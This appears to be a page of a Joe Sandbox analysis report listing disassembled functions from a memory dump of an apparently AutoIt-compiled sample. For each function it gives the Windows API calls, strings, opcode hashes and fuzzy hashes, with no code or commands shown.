Function 00767920 Relevance: .6, Instructions: 563COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f10805c091a130e920c16d5653d15a840e92e62f5e14f68b46ed1b3515b3068c
Instruction ID: dc8d595d835ad78a88a456d61fc5d6ecd7332e036c94ca2460ac21d9508a4d26
Opcode Fuzzy Hash: f10805c091a130e920c16d5653d15a840e92e62f5e14f68b46ed1b3515b3068c
Instruction Fuzzy Hash: 9A22E5B0A00609DFDF14CFA8C945AAEB3F6FF45344F248629E816A7291E73D9D15CB50

Function 007691C0 Relevance: .5, Instructions: 475COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93d898be3adb122f3968fe61e6c7dc9c0d942395d03030ba7ea0f70f14bab814
Instruction ID: b0f46370c895c76097af60f17bc392e879d409107cbc85dfe6441e02f36ec682
Opcode Fuzzy Hash: 93d898be3adb122f3968fe61e6c7dc9c0d942395d03030ba7ea0f70f14bab814
Instruction Fuzzy Hash: 3402C6B1A00205EFDF04DF64D995AAEB7B5FF45300F108169E906DB391EB39AE21CB91

Function 00781C77 Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction ID: cb24d435ae83cf18c06b0858c1ca48973d7c8c16bd00725d6055231bcce733ec
Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction Fuzzy Hash: 2691B6722480E34ADB29563E843413EFFE95A923A235A079DD4F2CA1C5FE28D956D730

Function 007819B0 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction ID: 7840bf2f11780a434b54bc853ed338d6a93e096bdb2dfdd63b8c74eb12505d44
Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction Fuzzy Hash: DE91D6722490E34EDB2D527AC47403DFFE94A923A235A479ED4F2CA1C1FE18D556D720

Function 00787A4A Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6418eda41777fcb2cb65a1d1077e6721f7eb03610c57c113b02db7ab70e64f0d
Instruction ID: 53346e3a860d382ce313e3272f0b94a126769ee6d93e0693056a4772d14e9968
Opcode Fuzzy Hash: 6418eda41777fcb2cb65a1d1077e6721f7eb03610c57c113b02db7ab70e64f0d
Instruction Fuzzy Hash: 43618AB12C870996DA3CBA2C8C99BBE679ADF51700F34491DE843DB281D61DDE42C367

Function 00787CA7 Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3d22fe536e57e1f332a28f44d3e43ae3c02f86ca58219abc5a8a3f7a145b57a
Instruction ID: b49ec23ec39949e7847043927fe3d016b279e94d3f188e79a8c79bc2bd0e6fd0
Opcode Fuzzy Hash: f3d22fe536e57e1f332a28f44d3e43ae3c02f86ca58219abc5a8a3f7a145b57a
Instruction Fuzzy Hash: D9616C317CC70996DA3C79284859BBF23849F42744F741959E943DB281E61DED41C376

Function 00781706 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction ID: e4327a773354e903967301ee1596d73781db6bba24b86ca461e1be56b84cd9df
Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction Fuzzy Hash: AF8194326480E30EDB2D923A853547EFFE55A923B135A079ED4F2CB1C1EE28D556E720

Function 007D2046 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea3847a67af38ed8a73b52c11f9737d5b48e606532999d227228475ae95585fc
Instruction ID: 1afaeb50f71f252419aba2a05e138ff762e2e300edc86395a01a9ae9a0a60354
Opcode Fuzzy Hash: ea3847a67af38ed8a73b52c11f9737d5b48e606532999d227228475ae95585fc
Instruction Fuzzy Hash: 4B21AB326205118BDB28CE79C81367A73E5B7A4310F15892EE4A7C37D1DE399905C740

Function 007E2ADE Relevance: 79.2, APIs: 40, Strings: 5, Instructions: 486filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 007E2B30
DeleteObject.GDI32(00000000), ref: 007E2B43
DestroyWindow.USER32 ref: 007E2B52
GetDesktopWindow.USER32 ref: 007E2B6D
GetWindowRect.USER32(00000000), ref: 007E2B74
SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 007E2CA3
AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 007E2CB1
CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007E2CF8
GetClientRect.USER32(00000000,?), ref: 007E2D04
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 007E2D40
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007E2D62
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007E2D75
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007E2D80
GlobalLock.KERNEL32(00000000), ref: 007E2D89
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007E2D98
GlobalUnlock.KERNEL32(00000000), ref: 007E2DA1
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007E2DA8
GlobalFree.KERNEL32(00000000), ref: 007E2DB3
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007E2DC5
OleLoadPicture.OLEAUT32(?,00000000,00000000,007FFC38,00000000), ref: 007E2DDB
GlobalFree.KERNEL32(00000000), ref: 007E2DEB
CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 007E2E11
SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 007E2E30
SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007E2E52
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007E303F

Strings

static, xrefs: 007E2D3A, 007E2E91
@U=u, xrefs: 007E2E30, 007E2FBF
, xrefs: 007E2FC5
AutoIt v3, xrefs: 007E2CF2
DISPLAY, xrefs: 007E2EA2

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $@U=u$AutoIt v3$DISPLAY$static
API String ID: 2211948467-3613752883
Opcode ID: 565b48acd1ab916f5d8520048c4029b99b30d92140ed91c96b7c0cd6170b743c
Instruction ID: f8e309d78e7bc9b753fe7f95f33a8224676aec0343b65385a19d5c6eb495bdd8
Opcode Fuzzy Hash: 565b48acd1ab916f5d8520048c4029b99b30d92140ed91c96b7c0cd6170b743c
Instruction Fuzzy Hash: 1A029D71500208EFDB15DF64CD89EAE7BB9FF48710F008558F916AB2A2DB78AD01CB60

Function 007F70D5 Relevance: 59.8, APIs: 33, Strings: 1, Instructions: 273COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 007F712F
GetSysColorBrush.USER32(0000000F), ref: 007F7160
GetSysColor.USER32(0000000F), ref: 007F716C
SetBkColor.GDI32(?,000000FF), ref: 007F7186
SelectObject.GDI32(?,?), ref: 007F7195
InflateRect.USER32(?,000000FF,000000FF), ref: 007F71C0
GetSysColor.USER32(00000010), ref: 007F71C8
CreateSolidBrush.GDI32(00000000), ref: 007F71CF
FrameRect.USER32(?,?,00000000), ref: 007F71DE
DeleteObject.GDI32(00000000), ref: 007F71E5
InflateRect.USER32(?,000000FE,000000FE), ref: 007F7230
FillRect.USER32(?,?,?), ref: 007F7262
GetWindowLongW.USER32(?,000000F0), ref: 007F7284

Part of subcall function 007F73E8: GetSysColor.USER32(00000012), ref: 007F7421
Part of subcall function 007F73E8: SetTextColor.GDI32(?,?), ref: 007F7425
Part of subcall function 007F73E8: GetSysColorBrush.USER32(0000000F), ref: 007F743B
Part of subcall function 007F73E8: GetSysColor.USER32(0000000F), ref: 007F7446
Part of subcall function 007F73E8: GetSysColor.USER32(00000011), ref: 007F7463
Part of subcall function 007F73E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 007F7471
Part of subcall function 007F73E8: SelectObject.GDI32(?,00000000), ref: 007F7482
Part of subcall function 007F73E8: SetBkColor.GDI32(?,00000000), ref: 007F748B
Part of subcall function 007F73E8: SelectObject.GDI32(?,?), ref: 007F7498
Part of subcall function 007F73E8: InflateRect.USER32(?,000000FF,000000FF), ref: 007F74B7
Part of subcall function 007F73E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 007F74CE
Part of subcall function 007F73E8: GetWindowLongW.USER32(00000000,000000F0), ref: 007F74DB

Strings

@U=u, xrefs: 007F72CC

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
String ID: @U=u
API String ID: 4124339563-2594219639
Opcode ID: c9e10948580c97f909a7719072cdc815a4b5fc8bb26d5d5cf8bd838154a12eb6
Instruction ID: 488736ded57737b783c7c162da006f421ea4425388e96c738d1a089a2f4f7d14
Opcode Fuzzy Hash: c9e10948580c97f909a7719072cdc815a4b5fc8bb26d5d5cf8bd838154a12eb6
Instruction Fuzzy Hash: B1A1B172008309EFDB059F60DD48E7B7BA9FF88320F204A19FA62961E1D778E854CB51

Function 00778D85 Relevance: 49.5, APIs: 26, Strings: 2, Instructions: 480windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?), ref: 00778E14
SendMessageW.USER32(?,00001308,?,00000000), ref: 007B6AC5
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 007B6AFE
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 007B6F43

Part of subcall function 00778F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00778BE8,?,00000000,?,?,?,?,00778BBA,00000000,?), ref: 00778FC5

SendMessageW.USER32(?,00001053), ref: 007B6F7F
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 007B6F96
ImageList_Destroy.COMCTL32(00000000,?), ref: 007B6FAC
ImageList_Destroy.COMCTL32(00000000,?), ref: 007B6FB7

Strings

@U=u, xrefs: 007B6AC5, 007B6BD6, 007B6EBF
0, xrefs: 007B6DCF

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
String ID: 0$@U=u
API String ID: 2760611726-975001249
Opcode ID: 058f42fb9b084ed6970b41576d916b831cab00f3d697fad1f3190672ed0db5ee
Instruction ID: d0556f64f899b389f3e2b1a902be5ac6f60df57879b736a4871d4ca3930dde46
Opcode Fuzzy Hash: 058f42fb9b084ed6970b41576d916b831cab00f3d697fad1f3190672ed0db5ee
Instruction Fuzzy Hash: A0129D30605201DFDB25DF24C958BBABBA1FB44700F548869F689CB261CB7DEC52DB51

Function 007E2711 Relevance: 47.6, APIs: 22, Strings: 5, Instructions: 330windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 007E273E
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 007E286A
SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 007E28A9
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 007E28B9
CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 007E2900
GetClientRect.USER32(00000000,?), ref: 007E290C
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 007E2955
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 007E2964
GetStockObject.GDI32(00000011), ref: 007E2974
SelectObject.GDI32(00000000,00000000), ref: 007E2978
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 007E2988
GetDeviceCaps.GDI32(00000000,0000005A), ref: 007E2991
DeleteDC.GDI32(00000000), ref: 007E299A
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 007E29C6
SendMessageW.USER32(00000030,00000000,00000001), ref: 007E29DD
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 007E2A1D
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 007E2A31
SendMessageW.USER32(00000404,00000001,00000000), ref: 007E2A42
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 007E2A77
GetStockObject.GDI32(00000011), ref: 007E2A82
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 007E2A8D
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 007E2A97

Strings

msctls_progress32, xrefs: 007E2A13
static, xrefs: 007E294F, 007E2A71
@U=u, xrefs: 007E29CC
AutoIt v3, xrefs: 007E28F8
DISPLAY, xrefs: 007E295A

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: @U=u$AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-2771358697
Opcode ID: be8dd9fe378b8507d4d0c4f713b8be9aede5fc20df61510ae712f49730cd8370
Instruction ID: b801e4ba4041cccd5ad6c02c65432240ecd4fc1a07089a77d084d7fcad47a1a9
Opcode Fuzzy Hash: be8dd9fe378b8507d4d0c4f713b8be9aede5fc20df61510ae712f49730cd8370
Instruction Fuzzy Hash: 64B17EB1A00209AFEB14DF68CD49FAE7BA9FB48714F008514FA15E7291D778ED40CBA4

Function 007F73E8 Relevance: 47.5, APIs: 26, Strings: 1, Instructions: 201windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 007F7421
SetTextColor.GDI32(?,?), ref: 007F7425
GetSysColorBrush.USER32(0000000F), ref: 007F743B
GetSysColor.USER32(0000000F), ref: 007F7446
CreateSolidBrush.GDI32(?), ref: 007F744B
GetSysColor.USER32(00000011), ref: 007F7463
CreatePen.GDI32(00000000,00000001,00743C00), ref: 007F7471
SelectObject.GDI32(?,00000000), ref: 007F7482
SetBkColor.GDI32(?,00000000), ref: 007F748B
SelectObject.GDI32(?,?), ref: 007F7498
InflateRect.USER32(?,000000FF,000000FF), ref: 007F74B7
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 007F74CE
GetWindowLongW.USER32(00000000,000000F0), ref: 007F74DB
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 007F752A
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 007F7554
InflateRect.USER32(?,000000FD,000000FD), ref: 007F7572
DrawFocusRect.USER32(?,?), ref: 007F757D
GetSysColor.USER32(00000011), ref: 007F758E
SetTextColor.GDI32(?,00000000), ref: 007F7596
DrawTextW.USER32(?,007F70F5,000000FF,?,00000000), ref: 007F75A8
SelectObject.GDI32(?,?), ref: 007F75BF
DeleteObject.GDI32(?), ref: 007F75CA
SelectObject.GDI32(?,?), ref: 007F75D0
DeleteObject.GDI32(?), ref: 007F75D5
SetTextColor.GDI32(?,?), ref: 007F75DB
SetBkColor.GDI32(?,?), ref: 007F75E5

Strings

@U=u, xrefs: 007F752A

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID: @U=u
API String ID: 1996641542-2594219639
Opcode ID: c751da13358114d07d7c38ff2cf541c52fca8455e190d23a82e3329244613c22
Instruction ID: a417778adb43a7bc9a37a116d5b7f810811bdaa36c7deb7f737c77e34f3484fb
Opcode Fuzzy Hash: c751da13358114d07d7c38ff2cf541c52fca8455e190d23a82e3329244613c22
Instruction Fuzzy Hash: C2616F7290421CAFDF059FA4DD49EFE7FB9EB08320F208115FA15AB2A1D7789950CB94

Function 007D4ADF Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 007D4AED
GetDriveTypeW.KERNEL32(?,007FCB68,?,\\.\,007FCC08), ref: 007D4BCA
SetErrorMode.KERNEL32(00000000,007FCB68,?,\\.\,007FCC08), ref: 007D4D36

Strings

Virtual, xrefs: 007D4CE5
SSD, xrefs: 007D4C4A
Unknown, xrefs: 007D4BED, 007D4C83
SAS, xrefs: 007D4CC9
PhysicalDrive, xrefs: 007D4B76
ATA, xrefs: 007D4C98
SCSI, xrefs: 007D4C8A
Fixed, xrefs: 007D4C09
Network, xrefs: 007D4C02
CDROM, xrefs: 007D4BFB
\\.\, xrefs: 007D4B3F
ATAPI, xrefs: 007D4C91
Fibre, xrefs: 007D4CAD
RAID, xrefs: 007D4CBB
1394, xrefs: 007D4C9F
Removable, xrefs: 007D4C10, 007D4C15
SATA, xrefs: 007D4CD0
MMC, xrefs: 007D4CDE
USB, xrefs: 007D4CB4
iSCSI, xrefs: 007D4CC2
RAMDisk, xrefs: 007D4BF4
FileBackedVirtual, xrefs: 007D4CEC
SSA, xrefs: 007D4CA6

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 6d51ea2ac77705ffd77c3f36f68c6dacec633af95ef4bb7c93c8bca3ed36ef20
Instruction ID: e7a3b9e1da4fd9996f27dca68e8decfc5c8709b1b8fc637c0859205cc5c1636a
Opcode Fuzzy Hash: 6d51ea2ac77705ffd77c3f36f68c6dacec633af95ef4bb7c93c8bca3ed36ef20
Instruction Fuzzy Hash: 5A61BF3061610ADBCB04DF24DA9597877B1FB04344B248417F80AEB791EB3EED91DB61

Function 007F0241 Relevance: 37.1, APIs: 7, Strings: 14, Instructions: 391windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 007F02E5
_wcslen.LIBCMT ref: 007F031F
_wcslen.LIBCMT ref: 007F0389
_wcslen.LIBCMT ref: 007F03F1
_wcslen.LIBCMT ref: 007F0475
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 007F04C5
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 007F0504

Part of subcall function 0077F9F2: _wcslen.LIBCMT ref: 0077F9FD

